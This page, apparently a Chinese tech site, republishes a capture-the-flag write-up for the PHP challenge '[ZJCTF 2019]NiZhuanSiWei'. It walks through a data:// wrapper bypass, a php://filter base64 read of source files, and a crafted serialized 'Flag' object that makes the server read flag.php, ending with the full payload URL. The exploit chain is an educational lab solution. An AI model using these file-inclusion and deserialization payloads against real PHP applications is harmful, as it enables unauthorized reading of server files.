扫码关注官方微信

扫码下载APP
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >[ZJCTF 2019]NiZhuanSiWei
  • 276

0
分享到

[ZJCTF 2019]NiZhuanSiWei

php安全网络安全web安全 2023-09-09 15:09:09 276人浏览 安东尼
摘要

目录 信息收集 代码审计 第一层 第二层 第三层 信息收集 打开页面又是代码审计 代码如下 代码审计 第一层 通过data伪协议模拟打开text文件 ?text=data://text/plain,welcome to the

目录

信息收集

代码审计

第一层

第二层

第三层

信息收集

打开页面又是代码审计

代码如下

 PHP  $text = $_GET["text"];$file = $_GET["file"];$passWord = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){    echo "
".file_get_contents($text,'r')."

";    if(preg_match("/flag/",$file)){        echo "Not now!";        exit();     }else{        include($file);  //useless.php        $password = unserialize($password);        echo $password;    }}else{    highlight_file(__FILE__);}?>

代码审计

第一层

通过data伪协议模拟打开text文件

?text=data://text/plain,welcome to the zjctf

第二层

通过filter伪协议读取useless.php

file=php://filter/convert.base64-encode/resource=useless.php

进行base64解码后得到useless.php的内容

file)){              echo file_get_contents($this->file);             echo "
";        return ("U R SO CLOSE !///COME ON PLZ");        }      }  }  ?>

第三层

看样子是利用反序列化

  • poc

class Flag{  //flag.php  

    public $file='flag.php';  

    public function __tostring()

    {  

        if(isset($this->file))

        {  

            echo file_get_contents($this->file);

            echo "
";

        return ("U R SO CLOSE !///COME ON PLZ");

        }  

    }  

}  

$a=new Flag();

echo serialize($a);

?>  

  • 序列化的结果

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

  • payload

?text=data://text/plain,welcome to the zjctf
&file=useless.php
&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

返回结果的源码里面找到flag 

来源地址:https://blog.csdn.net/qq_63701832/article/details/128721881

您可能感兴趣的文档:

--结束END--

本文标题: [ZJCTF 2019]NiZhuanSiWei

本文链接: https://lsjlt.com/news/401660.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
  • [ZJCTF 2019]NiZhuanSiWei
    目录 信息收集 代码审计 第一层 第二层 第三层 信息收集 打开页面又是代码审计 代码如下 代码审计 第一层 通过data伪协议模拟打开text文件 text=data://text/plain,welcome to the ...
    99+
    2023-09-09
    php 安全 网络安全 web安全
  • BUUCTF [ZJCTF 2019]NiZhuanSiWei1
    涉及知识点: php代码审计;date://text/plain协议;filter 协议;反序列化;魔术方法  打开题目链接,是直接给出的php代码。 第一个if语句要求test不为空并且text内容为welcome to t...
    99+
    2023-10-06
    php java 开发语言 网络安全
  • golang 2019安装
    Golang是Google公司于2007年推出的一种开源的编程语言,自推出以来,一直备受程序员的青睐。基于Golang的应用程序有着高效、高并发、开发便利等特点,适用于网络服务器、分布式系统、云计算等领域。那么,如何在2019年安装Gola...
    99+
    2023-05-22
  • MySQL学习 2019-12
    启动mysql服务: net start mysql 关闭mysql服务: net stop mysql cmd清屏: cls mysql -V 输出版本信息并且退出 mysql -u 用户名 mysql -p 密码 mysql ...
    99+
    2015-03-19
    MySQL学习 2019-12
  • SQL Server 2019 (Mac) Notes
    安装 安装过程参考官方教程即可,唯一需要注意的是密码的选择。密码有若干约束 根据SQL Server的要求,密码中必须包含数字、英文字母及符号 (non-alphanumeric char)。 在docker命令行下可以输入“$”符号,但...
    99+
    2020-02-03
    SQL Server 2019 (Mac) Notes 数据库入门 数据库基础教程 数据库 mysql
  • [RCTF 2019]Nextphp题解
    [RCTF 2019]Nextphp 题目代码很简单,看着很像白给的(最后惨遭打脸),直接执行system函数发现被ban了,遂查看phpinfo。 ...
    99+
    2023-09-13
    php web安全
  • Autocad Map 3D 2019破
    Autocad Map 3D 2019破解补丁点击下载Autocad map 3d 2019破解补丁是Autocad map 3d 2019软件中的专业化破解补丁工具,Autocad map 3d 2019,用于创建和编辑空间数据的领先平台...
    99+
    2023-01-31
    Autocad Map
  • 2019-07-09 CentOS7 安
    在CentOS7上默认安装的是python2.7版本,而使用yum install python34安装的是3.4版本,这个版本在安装一些软件包如pip的时候会提示: DEPRECATION: Python 3.4 support has ...
    99+
    2023-01-31
  • buuctf-web-[RoarCTF 2019]Easy Calc1
    打开环境 发现一个类似计算器的东西 尝试一些常规的测试参数 尝试单引号发现提示,但是并未报错,非sql注入 ...
    99+
    2023-09-22
    php Powered by 金山文档
  • 2019-01-28 [日常]Beyon
    看了一个Beyond的纪录片, 提到这个. 觉得心有不甘, 于是搜集了24首歌词, 用Python做了简单分词和词频统计. 源码(包括歌词)在: program-in-chinese/study 统计了总出现次数(词频列表)和词出现在歌曲...
    99+
    2023-01-30
    日常 Beyon
  • Visual Studio 2019中使用Git
    一、VS2019的Git介绍 1、VS2019自带Git功能。 2、选用Git作为源码代码插件。 3、将项目添加到Git进行源码管理。 二、在VS2019中使用GitHub 1...
    99+
    2024-04-02
  • [极客大挑战 2019]PHP1
    既然提到了备份网站估计也是存在着网站备份文件,可以先用御剑扫一下 啥都没扫出来,但是上回做文件备份的题目时收集了一些关于常用备份文件的文件名和后缀,可以直接使用burp抓包爆破,果然爆破出一个...
    99+
    2023-09-02
    php 开发语言 Powered by 金山文档
  • 2019-04-10 python入门学
    #   从决定学习编程语言到正式做出计划挤出空余时间,历经一年半,因工作原因及生活原因不断搁浅,从湖北到浙江再回湖北,暂时稳定在一家小公司,从日常加班中压缩时间学习,于此记录学习进度、学习问题,在此过程中望前辈们不吝指教,自己也会坚持住,...
    99+
    2023-01-31
    入门 python
  • 2019-02-18 扩展Python控
    "中文编程"知乎专栏原文地址 续前文扩展Python控制台实现中文反馈信息, 实现了如下效果: >>> 学 Traceback (most recent call last): File "<console&...
    99+
    2023-01-30
    Python
  • 2019-02-10 扩展Python控
    "中文编程"知乎专栏原文地址 参考了周蟒的实现, 运行效果如下: $ python3 解释器.py Python 3.6.5 (v3.6.5:f59c0932b4, Mar 28 2018, 05:52:31) [GCC 4.2.1 C...
    99+
    2023-01-30
    Python
  • 2019-02-13 Python爬虫问
    soup=BeautifulSoup(html.text,'lxml') #data=soup.select('body > div.main > div.ctr > div > div.newsmcont &g...
    99+
    2023-01-30
    爬虫 Python
  • 2019年第一条随笔
    今天是申请的博客第一天,也是2019年的第一天。为了纪念我第一次进入博客圈(以前从没写过),所以今天我要写的是关于人工智能的内容以致敬未来。此篇的内容来源是2018年11月的一篇博客。来源不详(其实是没仔细查。。。嘻嘻);       内...
    99+
    2023-01-30
    第一条 随笔
  • Visual Studio 2019更新到16.2.1
    Visual Studio 2019更新到16.2.1...
    99+
    2023-06-05
  • Visual Studio 2019更新到16.1.6
     Visual Studio 2019更新到16.1.6此次更新主要是修复几个安全漏洞,如CVE-2019-1077(VS自动更新漏洞)、CVE-2019-1075(ASP.net Core欺骗漏洞)...
    99+
    2023-06-05
  • 2019阿里云数据库
    标题 2019年,阿里云数据库的发展情况简介本文主要介绍了2019年阿里云数据库的发展情况。阿里云数据库是阿里云提供的一种云计算服务,包括多种类型的数据存储和处理工具,如关系型数据库、非关系型数据库、大数据存储等。本文将从几个方面深入探讨2...
    99+
    2024-01-25
    阿里 数据库
软考高级职称资格查询
热门wiki
近期文章
推荐阅读
热门问答
热门标签
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。

  • 官方手机版

  • 微信公众号

  • 商务合作